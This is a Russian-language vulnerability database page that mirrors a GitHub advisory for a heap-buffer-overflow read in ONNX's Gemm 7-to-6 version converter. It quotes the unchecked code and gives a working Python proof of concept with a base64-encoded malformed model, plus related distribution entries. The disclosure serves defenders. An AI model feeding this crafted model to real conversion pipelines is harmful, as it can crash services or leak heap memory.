Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-p893-rvq9-2xf9

Опубликовано: 24 июл. 2026
Источник: github
Github: Прошло ревью
CVSS3: 3.3

Описание

ONNX: Heap-Buffer-Overflow READ in Gemm Version Converter Adapter via Undersized Input Shape

Summary

Heap-buffer-overflow READ (16 bytes) in Gemm_7_6::adapt_gemm_7_6() (onnx/version_converter/adapters/gemm_7_6.h:41) when ConvertVersion() processes a model with a Gemm node whose input tensors have fewer than 2 dimensions. The adapter accesses B_shape[1] without checking rank. On Release builds the OOB read is silent; ASan confirms 16-byte read past a 48-byte allocation.

Details

The Gemm 7→6 downgrade adapter reads input shapes without bounds checking:

// gemm_7_6.h:26-42 const auto& A_shape = inputs[0]->sizes(); // May have < 2 elements const auto& B_shape = inputs[1]->sizes(); // May have < 2 elements if (node->hasAttribute(ktransB) && node->i(ktransB) == 1) { MN.emplace_back(B_shape[0]); // OOB if B has 0 dims } else { MN.emplace_back(B_shape[1]); // OOB if B has < 2 dims ← CRASH }

The PoC has input B with shape [28] (1 dimension). B_shape has 1 element. Accessing B_shape[1] reads 16 bytes past the std::vector<Dimension> internal storage into adjacent heap memory.

The same unchecked pattern applies to A_shape[0] and A_shape[1] at lines 34 and 36.

Entry point: onnx.version_converter.convert_version(model, 6) — different from the InferShapes bugs reported in separate advisories. This triggers during opset downgrade (7→6).

PoC

import base64 import onnx from onnx import version_converter poc_b64 = "CAM6rwEKUQoBQQoBQgoBQRIBWSIER2VtbSoPCgVhbHBoYRUBAQA+oAEBKg4KBGJldGEVAAAAOqABASoNCgZ0dGZsc0EYAaABAioNCgZ0cmFuc0IYAKABAhIKb2Vpdl94bWZ2aFoTCgFBEg4KDAgBEggKAggCCgIIA1oTCgFCEg4KDAgBEggKAggcCgIIBFoPCgFCEgoKCAgBEgQKAggbYhMKAVkSDgoMCAESCAoCCAIKAggEQgQKABAH" model = onnx.load_from_string(base64.b64decode(poc_b64)) # Triggers heap-buffer-overflow in Gemm_7_6 adapter version_converter.convert_version(model, 6)

186-byte PoC. ASan confirms: heap-buffer-overflow READ of size 16 at gemm_7_6.h:41, 0 bytes after 48-byte region allocated in tensorShapeProtoToDimensions at ir_pb_converter.cc:216.

Impact

Any application that uses onnx.version_converter.convert_version() on untrusted models is vulnerable. This includes model conversion pipelines and tools that auto-downgrade opset versions for compatibility. On Release builds the OOB read is silent — the read value propagates into the converted model's output shape, potentially leaking heap data. On ASan builds it's detected as a heap-buffer-overflow. Could also cause crashes with different heap layouts.

Пакеты

Наименование

onnx

pip
Затронутые версииВерсия исправления

>= 1.3.0, <= 1.21.0

1.22.0

EPSS

Процентиль: 6%
0.00163
Низкий

3.3 Low

CVSS3

Дефекты

CWE-125

Связанные уязвимости

CVSS3: 3.3
ubuntu
17 дней назад

Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. From 1.3.0 until 1.22.0, onnx.version_converter.convert_version() can perform an out-of-bounds read in Gemm_7_6::adapt_gemm_7_6() in onnx/version_converter/adapters/gemm_7_6.h when a Gemm node has input tensors with fewer than two dimensions because B_shape[1], A_shape[0], or A_shape[1] is accessed without a rank check, potentially causing a process crash during an opset 7 to 6 downgrade. This issue is fixed in version 1.22.0.

CVSS3: 3.3
redhat
17 дней назад

Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. From 1.3.0 until 1.22.0, onnx.version_converter.convert_version() can perform an out-of-bounds read in Gemm_7_6::adapt_gemm_7_6() in onnx/version_converter/adapters/gemm_7_6.h when a Gemm node has input tensors with fewer than two dimensions because B_shape[1], A_shape[0], or A_shape[1] is accessed without a rank check, potentially causing a process crash during an opset 7 to 6 downgrade. This issue is fixed in version 1.22.0.

CVSS3: 3.3
nvd
17 дней назад

Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. From 1.3.0 until 1.22.0, onnx.version_converter.convert_version() can perform an out-of-bounds read in Gemm_7_6::adapt_gemm_7_6() in onnx/version_converter/adapters/gemm_7_6.h when a Gemm node has input tensors with fewer than two dimensions because B_shape[1], A_shape[0], or A_shape[1] is accessed without a rank check, potentially causing a process crash during an opset 7 to 6 downgrade. This issue is fixed in version 1.22.0.

CVSS3: 3.3
debian
17 дней назад

Open Neural Network Exchange (ONNX) is an open standard for machine le ...

EPSS

Процентиль: 6%
0.00163
Низкий

3.3 Low

CVSS3

Дефекты

CWE-125